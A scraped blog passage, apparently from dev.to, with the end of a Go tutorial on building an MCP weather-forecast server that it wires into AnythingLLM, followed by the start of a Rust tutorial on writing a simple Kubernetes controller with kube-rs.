class="n">TemperatureUnit</span> <span class="kt">string</span> <span class="s">`json:"temperatureUnit,omitempty"`</span> <span class="n">WindSpeed</span> <span class="kt">string</span> <span class="s">`json:"windSpeed,omitempty"`</span> <span class="n">WindDirection</span> <span class="kt">string</span> <span class="s">`json:"windDirection,omitempty"`</span> <span class="n">ShortForecast</span> <span class="kt">string</span> <span class="s">`json:"shortForecast,omitempty"`</span> <span class="n">DetailedForecast</span> <span class="kt">string</span> <span class="s">`json:"detailedForecast,omitempty"`</span> <span class="p">}</span> <span class="s">`json:"periods,omitempty"`</span> <span class="p">}</span> <span class="s">`json:"properties,omitempty"`</span> <span class="p">}</span> </code></pre> </div> <h3> Building the Forecast tool </h3> <p>The Forecast tool is how we expose to our client how/when the Forecast should be called.</p> <p>It requests for parameters like "a City name", "a file location", "what numbers should be suummed".</p> <p>The snippets below define the tool and the call execution. Later we will add it to the main MCP server.</p> <p>Let's take a look into the function:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="k">import</span> <span class="p">(</span> <span class="s">"github.com/mark3labs/mcp-go/mcp"</span> <span class="p">)</span> <span class="c">// Add forecast tool</span> <span class="k">func</span> <span class="n">getForecast</span><span class="p">()</span> <span class="n">mcp</span><span class="o">.</span><span class="n">Tool</span> <span class="p">{</span> <span class="n">weatherTool</span> <span class="o">:=</span> <span class="n">mcp</span><span class="o">.</span><span class="n">NewTool</span><span class="p">(</span><span class="s">"get_forecast"</span><span class="p">,</span> <span class="n">mcp</span><span class="o">.</span><span class="n">WithDescription</span><span class="p">(</span><span class="s">"Get weather forecast for a location"</span><span class="p">),</span> <span class="n">mcp</span><span class="o">.</span><span class="n">WithNumber</span><span class="p">(</span><span class="s">"latitude"</span><span class="p">,</span> <span class="n">mcp</span><span class="o">.</span><span class="n">Required</span><span class="p">(),</span> <span class="n">mcp</span><span class="o">.</span><span class="n">Description</span><span class="p">(</span><span class="s">"Latitude of the location"</span><span class="p">),</span> <span class="p">),</span> <span class="n">mcp</span><span class="o">.</span><span class="n">WithNumber</span><span class="p">(</span><span class="s">"longitude"</span><span class="p">,</span> <span class="n">mcp</span><span class="o">.</span><span class="n">Required</span><span class="p">(),</span> <span class="n">mcp</span><span class="o">.</span><span class="n">Description</span><span class="p">(</span><span class="s">"Longitude of the location"</span><span class="p">),</span> <span class="p">),</span> <span class="p">)</span> <span class="k">return</span> <span class="n">weatherTool</span> <span class="p">}</span> </code></pre> </div> <p>When the MCP Client connects to a MCP Server, the MCP server exposes get_forecast as a valid tool, requesting latitute and longitude parameters. </p> <p><strong>Note</strong>: I don't understand yet the magics between a prompt receiving a request like "give me the forecast of bla" and deferring to the get_forecast tool! </p> <p>Setting the forecast tool is not enough. We need to define to our server, once a "get_forecast" call is made, what it should execute. First, we define a util function to call the API:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="k">const</span> <span class="p">(</span> <span class="n">nws_api_base</span> <span class="o">=</span> <span class="s">"https://api.weather.gov"</span> <span class="n">user_agent</span> <span class="o">=</span> <span class="s">"weather-app/1.0"</span> <span class="p">)</span> <span class="k">func</span> <span class="n">makeNWSRequest</span><span class="p">(</span><span class="n">requrl</span> <span class="kt">string</span><span class="p">)</span> <span class="p">([]</span><span class="kt">byte</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span> <span class="n">client</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">http</span><span class="o">.</span><span class="n">Client</span><span class="p">{}</span> <span class="n">req</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">http</span><span class="o">.</span><span class="n">NewRequest</span><span class="p">(</span><span class="n">http</span><span class="o">.</span><span class="n">MethodGet</span><span class="p">,</span> <span class="n">requrl</span><span class="p">,</span> <span class="no">nil</span><span class="p">)</span> <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span> <span class="p">}</span> <span class="n">req</span><span class="o">.</span><span class="n">Header</span><span class="o">.</span><span class="n">Set</span><span class="p">(</span><span class="s">"User-Agent"</span><span class="p">,</span> <span class="n">user_agent</span><span class="p">)</span> <span class="n">req</span><span class="o">.</span><span class="n">Header</span><span class="o">.</span><span class="n">Set</span><span class="p">(</span><span class="s">"Accept"</span><span class="p">,</span> <span class="s">"application/geo+json"</span><span class="p">)</span> <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">client</span><span class="o">.</span><span class="n">Do</span><span class="p">(</span><span class="n">req</span><span class="p">)</span> <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span> <span class="p">}</span> <span class="k">defer</span> <span class="n">resp</span><span class="o">.</span><span class="n">Body</span><span class="o">.</span><span class="n">Close</span><span class="p">()</span> <span class="n">body</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">io</span><span class="o">.</span><span class="n">ReadAll</span><span class="p">(</span><span class="n">resp</span><span class="o">.</span><span class="n">Body</span><span class="p">)</span> <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span> <span class="p">}</span> <span class="k">return</span> <span class="n">body</span><span class="p">,</span> <span class="no">nil</span> <span class="p">}</span> </code></pre> </div> <p>Then we need the proper function that will make requests to the API, and format the response properly:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="k">const</span> <span class="p">(</span> <span class="c">// We just want the next 5 forecast results</span> <span class="n">maxForecastPeriods</span> <span class="o">=</span> <span class="m">5</span> <span class="p">)</span> <span class="k">func</span> <span class="n">forecastCall</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">request</span> <span class="n">mcp</span><span class="o">.</span><span class="n">CallToolRequest</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">mcp</span><span class="o">.</span><span class="n">CallToolResult</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span> <span class="c">// Fetches latitude and longitude passed to the tool call</span> <span class="n">latitude</span> <span class="o">:=</span> <span class="n">request</span><span class="o">.</span><span class="n">Params</span><span class="o">.</span><span class="n">Arguments</span><span class="p">[</span><span class="s">"latitude"</span><span class="p">]</span><span class="o">.</span><span class="p">(</span><span class="kt">float64</span><span class="p">)</span> <span class="n">longitude</span> <span class="o">:=</span> <span class="n">request</span><span class="o">.</span><span class="n">Params</span><span class="o">.</span><span class="n">Arguments</span><span class="p">[</span><span class="s">"longitude"</span><span class="p">]</span><span class="o">.</span><span class="p">(</span><span class="kt">float64</span><span class="p">)</span> <span class="c">// Makes the API call.</span> <span class="n">pointsURL</span> <span class="o">:=</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="s">"%s/points/%.4f,%.4f"</span><span class="p">,</span> <span class="n">nws_api_base</span><span class="p">,</span> <span class="n">latitude</span><span class="p">,</span> <span class="n">longitude</span><span class="p">)</span> <span class="n">points</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">makeNWSRequest</span><span class="p">(</span><span class="n">pointsURL</span><span class="p">)</span> <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Errorf</span><span class="p">(</span><span class="s">"error calling points API: %w"</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span> <span class="p">}</span> <span class="n">pointsData</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">WeatherPoints</span><span class="p">{}</span> <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">Unmarshal</span><span class="p">(</span><span class="n">points</span><span class="p">,</span> <span class="n">pointsData</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Errorf</span><span class="p">(</span><span class="s">"error unmarshalling points data: %w"</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span> <span class="p">}</span> <span class="k">if</span> <span class="n">pointsData</span> <span class="o">==</span> <span class="no">nil</span> <span class="o">||</span> <span class="n">pointsData</span><span class="o">.</span><span class="n">Properties</span><span class="o">.</span><span class="n">Forecast</span> <span class="o">==</span> <span class="s">""</span> <span class="p">{</span> <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Errorf</span><span class="p">(</span><span class="s">"points does not contain forecast url"</span><span class="p">)</span> <span class="p">}</span> <span class="c">// Make a second API call with the Forecast URL to get the forecast result</span> <span class="n">forecastReq</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">makeNWSRequest</span><span class="p">(</span><span class="n">pointsData</span><span class="o">.</span><span class="n">Properties</span><span class="o">.</span><span class="n">Forecast</span><span class="p">)</span> <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Errorf</span><span class="p">(</span><span class="s">"error getting the forecast data"</span><span class="p">)</span> <span class="p">}</span> <span class="n">forecastData</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">Forecast</span><span class="p">{}</span> <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">Unmarshal</span><span class="p">(</span><span class="n">forecastReq</span><span class="p">,</span> <span class="n">forecastData</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Errorf</span><span class="p">(</span><span class="s">"error unmarshalling points data: %w"</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span> <span class="p">}</span> <span class="k">type</span> <span class="n">ForecastResult</span> <span class="k">struct</span> <span class="p">{</span> <span class="n">Name</span> <span class="kt">string</span> <span class="s">`json:"Name"`</span> <span class="n">Temperature</span> <span class="kt">string</span> <span class="s">`json:"Temperature"`</span> <span class="n">Wind</span> <span class="kt">string</span> <span class="s">`json:"Wind"`</span> <span class="n">Forecast</span> <span class="kt">string</span> <span class="s">`json:"Forecast"`</span> <span class="p">}</span> <span class="c">// format a json containing the 5 forecasts</span> <span class="n">forecast</span> <span class="o">:=</span> <span class="nb">make</span><span class="p">([]</span><span class="n">ForecastResult</span><span class="p">,</span> <span class="n">maxForecastPeriods</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">period</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">forecastData</span><span class="o">.</span><span class="n">Properties</span><span class="o">.</span><span class="n">Periods</span> <span class="p">{</span> <span class="n">forecast</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">ForecastResult</span><span class="p">{</span> <span class="n">Name</span><span class="o">:</span> <span class="n">period</span><span class="o">.</span><span class="n">Name</span><span class="p">,</span> <span class="n">Temperature</span><span class="o">:</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="s">"%d°%s"</span><span class="p">,</span> <span class="n">period</span><span class="o">.</span><span class="n">Temperature</span><span class="p">,</span> <span class="n">period</span><span class="o">.</span><span class="n">TemperatureUnit</span><span class="p">),</span> <span class="n">Wind</span><span class="o">:</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="s">"%s %s"</span><span class="p">,</span> <span class="n">period</span><span class="o">.</span><span class="n">WindSpeed</span><span class="p">,</span> <span class="n">period</span><span class="o">.</span><span class="n">WindDirection</span><span class="p">),</span> <span class="n">Forecast</span><span class="o">:</span> <span class="n">period</span><span class="o">.</span><span class="n">DetailedForecast</span><span class="p">,</span> <span class="p">}</span> <span class="k">if</span> <span class="n">i</span> <span class="o">&gt;=</span> <span class="n">maxForecastPeriods</span><span class="o">-</span><span class="m">1</span> <span class="p">{</span> <span class="k">break</span> <span class="p">}</span> <span class="p">}</span> <span class="n">forecastResponse</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">Marshal</span><span class="p">(</span><span class="o">&amp;</span><span class="n">forecast</span><span class="p">)</span> <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Errorf</span><span class="p">(</span><span class="s">"error marshalling forecast: %w"</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span> <span class="p">}</span> <span class="c">// And return it as string back to the caller function</span> <span class="k">return</span> <span class="n">mcp</span><span class="o">.</span><span class="n">NewToolResultText</span><span class="p">(</span><span class="kt">string</span><span class="p">(</span><span class="n">forecastResponse</span><span class="p">)),</span> <span class="no">nil</span> <span class="p">}</span> </code></pre> </div> <h3> Defining the main server </h3> <p>With everything in place, we can define the main server, add our tool and the "handler" function for that tool:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="k">import</span> <span class="p">(</span> <span class="s">"github.com/mark3labs/mcp-go/server"</span> <span class="p">)</span> <span class="k">func</span> <span class="n">main</span><span class="p">()</span> <span class="p">{</span> <span class="c">// Create a new MCP server</span> <span class="n">s</span> <span class="o">:=</span> <span class="n">server</span><span class="o">.</span><span class="n">NewMCPServer</span><span class="p">(</span> <span class="s">"Weather Demo"</span><span class="p">,</span> <span class="s">"1.0.0"</span><span class="p">,</span> <span class="n">server</span><span class="o">.</span><span class="n">WithResourceCapabilities</span><span class="p">(</span><span class="no">true</span><span class="p">,</span> <span class="no">true</span><span class="p">),</span> <span class="n">server</span><span class="o">.</span><span class="n">WithLogging</span><span class="p">(),</span> <span class="n">server</span><span class="o">.</span><span class="n">WithRecovery</span><span class="p">(),</span> <span class="p">)</span> <span class="c">// Add the forecast tool and its handler function</span> <span class="n">s</span><span class="o">.</span><span class="n">AddTool</span><span class="p">(</span><span class="n">getForecast</span><span class="p">(),</span> <span class="n">forecastCall</span><span class="p">)</span> <span class="c">// Start the server</span> <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">server</span><span class="o">.</span><span class="n">ServeStdio</span><span class="p">(</span><span class="n">s</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Printf</span><span class="p">(</span><span class="s">"Server error: %v</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>With that in place, we can try simply building and executing our Go program. It should give us any return, and wait for inputs on STDIO. After that, interrupt it with Ctrl-C<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>go build <span class="nt">-o</span> forecast <span class="nb">.</span> ./forecast </code></pre> </div> <h2> Integrating with AnythingLLM </h2> <p>The integration with AnythingLLM is made defining the MCP server binary that we want to call. It is a JSON config, and its schema follows the same definition for Claude Desktop.</p> <p>The configuration location may vary from each OS, on MacOS you define it on <code>~/Library/Application\ Support/anythingllm-desktop/storage/plugins/anythingllm_mcp_servers.json</code>.</p> <p>Following is how mine is defined:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"mcpServers"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"weather"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"command"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/Users/rkatz/codes/mcp/weather-go/forecast"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Once it is defined, we can verify if it is properly working on the UI:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F57w5qupxi2fk1cz3tv5x.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F57w5qupxi2fk1cz3tv5x.png" alt="Image description" width="800" height="516"></a></p> <p>As we can see it is working, we can make a prompt call like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>@agent what's the forecast for Atlanta? </code></pre> </div> <p>It is important to use the <code>@agent</code> on the beginning of the Prompt. AnythingLLM requires this to understand this should be sent to MCP Server.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw1hs021c05296o7898n3.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw1hs021c05296o7898n3.png" alt="Image description" width="800" height="724"></a></p> <p>With that, we can see that AnythingLLM deferred the call to MCP Server, made the call and formatted the output.</p> <h2> Debugging </h2> <p>Sometimes things may go wrong. The most common mistake I have faced is <strong>Wrong command call</strong> on AnythingLLM configuration.</p> <p>If the prompt answers there's some error on the Agent/MCP Server, you can request for the prompt for some more information, like <code>Can you print the full error</code> or <code>can you print the Json response from Server</code> and it should print some useful information.</p> <h2> Acknowledges </h2> <p>My acknowledge here goes to my friend Anderson Duboc, that helped me start scratching this surface with all the patience that I require! :) </p> <p>Also, for the folks who created this amazing SDK and saved me a lot of time.</p> mcp llm go Building a simple Kubernetes Controller in Rust - Part 1 Ricardo Katz Tue, 04 Mar 2025 22:32:32 +0000 https://dev.to/rkatz/building-a-simple-kubernetes-controller-in-rust-part-1-2j1i https://dev.to/rkatz/building-a-simple-kubernetes-controller-in-rust-part-1-2j1i <p>Recently I got this obsession to learn Rust. While there are plenty of documentation around, like <a href="https://doc.rust-lang.org/book/" rel="noopener noreferrer">Rust Book</a>, some <a href="https://github.com/sger/RustBooks" rel="noopener noreferrer">good published books</a>, tutorials, <a href="https://github.com/rust-lang/rustlings" rel="noopener noreferrer">rustling</a>, I always struggle to learn something when I am not doing something practical, so I have decided to go to my comfort zone and write a Kubernetes Controller using <a href="https://kube.rs/" rel="noopener noreferrer">kube-rs</a>.</p> <p>This article intends to help people with some basic knowledge of Rust and Kubernetes controllers written in Go to build a simple controller and understand a bit more how it works. I won't cover here how to install Rust, or how to manage Cargo, or even details of dependencies like <a href="//tokio.rs">tokio</a>. The goal is to build a simple controller :)</p> <p>If you have any questions on "why this line is required", I highly recommend you to paste the question in ChatGPT asking for an explanation. It may make things clear! An example: <a href="https://chatgpt.com/share/67c78315-4d30-8002-8aa1-731171fc533f" rel="noopener noreferrer">https://chatgpt.com/share/67c78315-4d30-8002-8aa1-731171fc533f</a></p> <h2> Getting a Kubernetes client </h2> <p>The first step on a controller is to bootstrap a Kubernetes Client. We need to add the kube-rs with the client <a href="https://kube.rs/features/" rel="noopener noreferrer">feature</a> and Kubernetes OpenAPI to our program.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>cargo add kube <span class="nt">-F</span> client cargo add k8s-openapi <span class="nt">-F</span> latest </code></pre> </div> <p>After that, we can create a program that connects to our Kubernetes cluster using the current Kubernetes context.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">use</span> <span class="nn">kube</span><span class="p">::</span><span class="n">Client</span><span class="p">;</span> <span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="k">let</span> <span class="n">client</span> <span class="o">=</span> <span class="nn">Client</span><span class="p">::</span><span class="nf">try_default</span><span class="p">();</span> <span class="p">}</span> </code></pre> </div> <p>But if you try to run this program with <code>cargo run</code> it is going to be a no-op. </p> <p>Because of the nature of Kubernetes and its operation being "network operations", kube-rs considers all the operations as "async" operations, and we need a way to manage it. The well-known and mostly used way of doing it is with the <a href="https://tokio.rs/" rel="noopener noreferrer">tokio</a> framework. Adding tokio, with features of "macros" (to use macros like <code>#[tokio::main]</code>) and a runtime (rt-multi-thread) should be enough. Additionally, we need to return an error to this function, so we will be using <a href="https://docs.rs/anyhow/latest/anyhow/" rel="noopener noreferrer">anyhow crate</a>, that allows us to return errors without worrying about the error type<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>cargo add tokio -F macros,rt-multi-thread cargo add anyhow </code></pre> </div> <p>And then we update the program as:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">use</span> <span class="nn">kube</span><span class="p">::</span><span class="n">Client</span><span class="p">;</span> <span class="nd">#[tokio::main]</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nn">anyhow</span><span class="p">::</span><span class="nb">Result</span><span class="o">&lt;</span><span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">client</span> <span class="o">=</span> <span class="nn">Client</span><span class="p">::</span><span class="nf">try_default</span><span class="p">()</span> <span class="k">.await</span> <span class="nf">.expect</span><span class="p">(</span><span class="s">"error getting a Kubernetes client"</span><span class="p">);</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="p">}</span> </code></pre> </div> <p>Great, our program is still a no-op but prepared for Kubernetes Client. Let's list some Services. We will need to add Kubernetes Core types to the scope, and then use the client to list it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">use</span> <span class="nn">k8s_openapi</span><span class="p">::</span><span class="nn">api</span><span class="p">::</span><span class="nn">core</span><span class="p">::</span><span class="nn">v1</span><span class="p">::</span><span class="n">Service</span><span class="p">;</span> <span class="c1">// Add Service API to scope</span> <span class="k">use</span> <span class="nn">kube</span><span class="p">::{</span> <span class="n">Client</span><span class="p">,</span> <span class="nn">api</span><span class="p">::{</span><span class="n">Api</span><span class="p">,</span> <span class="n">ListParams</span><span class="p">},</span> <span class="p">};</span> <span class="nd">#[tokio::main]</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nn">anyhow</span><span class="p">::</span><span class="nb">Result</span><span class="o">&lt;</span><span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">client</span> <span class="o">=</span> <span class="nn">Client</span><span class="p">::</span><span class="nf">try_default</span><span class="p">()</span> <span class="k">.await</span> <span class="nf">.expect</span><span class="p">(</span><span class="s">"error getting a Kubernetes client"</span><span class="p">);</span> <span class="k">let</span> <span class="n">service</span><span class="p">:</span> <span class="n">Api</span><span class="o">&lt;</span><span class="n">Service</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">Api</span><span class="p">::</span><span class="nf">all</span><span class="p">(</span><span class="n">client</span><span class="p">);</span> <span class="c1">// Define our service client with all namespaces on context</span> <span class="k">let</span> <span class="n">lp</span> <span class="o">=</span> <span class="nn">ListParams</span><span class="p">::</span><span class="nf">default</span><span class="p">();</span> <span class="c1">// List anything. Here you can set filters like label filters</span> <span class="k">for</span> <span class="n">svc</span> <span class="k">in</span> <span class="n">service</span><span class="nf">.list</span><span class="p">(</span><span class="o">&amp;</span><span class="n">lp</span><span class="p">)</span><span class="k">.await</span><span class="o">?</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span> <span class="s">"found service {}/{}"</span><span class="p">,</span> <span class="n">svc</span><span class="py">.metadata.namespace</span><span class="nf">.unwrap</span><span class="p">(),</span> <span class="n">svc</span><span class="py">.metadata.name</span><span class="nf">.unwrap</span><span class="p">()</span> <span class="p">);</span> <span class="p">}</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="c1">// This is a function that returns a "Result", so we need to return something</span> <span class="p">}</span> </code></pre> </div> <p>Great, doing a <code>cargo run</code> should return all the Services of our cluster. This main program will be split to a new "run" function, for the sake of being more clean:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">use</span> <span class="nn">k8s_openapi</span><span class="p">::</span><span class="nn">api</span><span class="p">::</span><span class="nn">core</span><span class="p">::</span><span class="nn">v1</span><span class="p">::</span><span class="n">Service</span><span class="p">;</span> <span class="k">use</span> <span class="nn">kube</span><span class="p">::{</span> <span class="n">Client</span><span class="p">,</span> <span class="nn">api</span><span class="p">::{</span><span class="n">Api</span><span class="p">,</span> <span class="n">ListParams</span><span class="p">},</span> <span class="p">};</span> <span class="nd">#[tokio::main]</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nn">anyhow</span><span class="p">::</span><span class="nb">Result</span><span class="o">&lt;</span><span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span> <span class="nf">run</span><span class="p">()</span><span class="k">.await</span><span class="p">;</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="p">}</span> <span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">run</span><span class="p">()</span> <span class="p">{</span> <span class="k">let</span> <span class="n">client</span> <span class="o">=</span> <span class="nn">Client</span><span class="p">::</span><span class="nf">try_default</span><span class="p">()</span> <span class="k">.await</span> <span class="nf">.expect</span><span class="p">(</span><span class="s">"error getting a Kubernetes client"</span><span class="p">);</span> <span class="k">let</span> <span class="n">service</span><span class="p">:</span> <span class="n">Api</span><span class="o">&lt;</span><span class="n">Service</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">Api</span><span class="p">::</span><span class="nf">all</span><span class="p">(</span><span class="n">client</span><span class="p">);</span> <span class="k">let</span> <span class="n">lp</span> <span class="o">=</span> <span class="nn">ListParams</span><span class="p">::</span><span class="nf">default</span><span class="p">();</span> <span class="k">for</span> <span class="n">svc</span> <span class="k">in</span> <span class="n">service</span><span class="nf">.list</span><span class="p">(</span><span class="o">&amp;</span><span class="n">lp</span><span class="p">)</span><span class="k">.await</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"error listing services"</span><span class="p">)</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span> <span class="s">"found service {}/{}"</span><span class="p">,</span> <span class="n">svc</span><span class="py">.metadata.namespace</span><span class="nf">.unwrap</span><span class="p">(),</span> <span class="n">svc</span><span class="py">.metadata.name</span><span class="nf">.unwrap</span><span class="p">()</span> <span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <h2> Creating a "context" </h2> <p>Because of Rust nature of memory safety, borrow checking and variables lifetimes, we need to be sure that the client will exist for any new thread of our controller. The way of doing it is creating a struct that contains a clone of our client, and eventually any other resource we may need during reconciliation, like Prometheus instrumentation client, etc.</p> <p>We can add this context struct as part of our lib.rs to make it available to the whole module we are writing, so we will have now a program that creates a new context for every reconciler we define:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="c1">// lib.rs</span> <span class="k">use</span> <span class="nn">kube</span><span class="p">::</span><span class="n">Client</span><span class="p">;</span> <span class="c1">// This macro makes our structure "clonable"</span> <span class="nd">#[derive(Clone)]</span> <span class="k">pub</span> <span class="k">struct</span> <span class="n">Context</span> <span class="p">{</span> <span class="k">pub</span> <span class="n">client</span><span class="p">:</span> <span class="n">Client</span><span class="p">,</span> <span class="p">}</span> <span class="c1">// main.rs</span> <span class="c1">// we will hide main function and some imports</span> <span class="k">use</span> <span class="nn">my_rust_controller</span><span class="p">::</span><span class="n">Context</span><span class="p">;</span> <span class="c1">// my_rust_controller is my crate name. There may be a better way to do it, so feel free to comment :) </span> <span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">run</span><span class="p">()</span> <span class="p">{</span> <span class="k">let</span> <span class="n">client</span> <span class="o">=</span> <span class="nn">Client</span><span class="p">::</span><span class="nf">try_default</span><span class="p">()</span> <span class="k">.await</span> <span class="nf">.expect</span><span class="p">(</span><span class="s">"error getting a Kubernetes client"</span><span class="p">);</span> <span class="k">let</span> <span class="n">ctx</span> <span class="o">=</span> <span class="n">Context</span> <span class="p">{</span> <span class="n">client</span><span class="p">:</span> <span class="n">client</span><span class="nf">.clone</span><span class="p">(),</span> <span class="p">};</span> <span class="p">}</span> </code></pre> </div> <p>Again, this program is a no-op. What we are doing here is, everytime run() is called, it will create a Kubernetes client, and then a new context with a clone of this client is created (remember, Rust lifetimes)</p> <h2> Creating the controller </h2> <p>With everything in place, we can now create a new module that will contain our controller logics. The idea of this controller is, "given a new service created, if its name is bad-service on namespace default print an error".</p> <p>Before anything, we need to add kube-rs controller runtime to our project. We will also add the "<a href="https://crates.io/crates/thiserror" rel="noopener noreferrer">thiserror</a>" to make it easier to generate the errors, and "<a href="https://crates.io/crates/futures" rel="noopener noreferrer">futures</a>" as a required dependency<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>cargo add kube -F runtime cargo add thiserror futures </code></pre> </div> <p>Our main.rs and lib.rs will need some changes to call the reconciler, and contain some errors enum:<br> 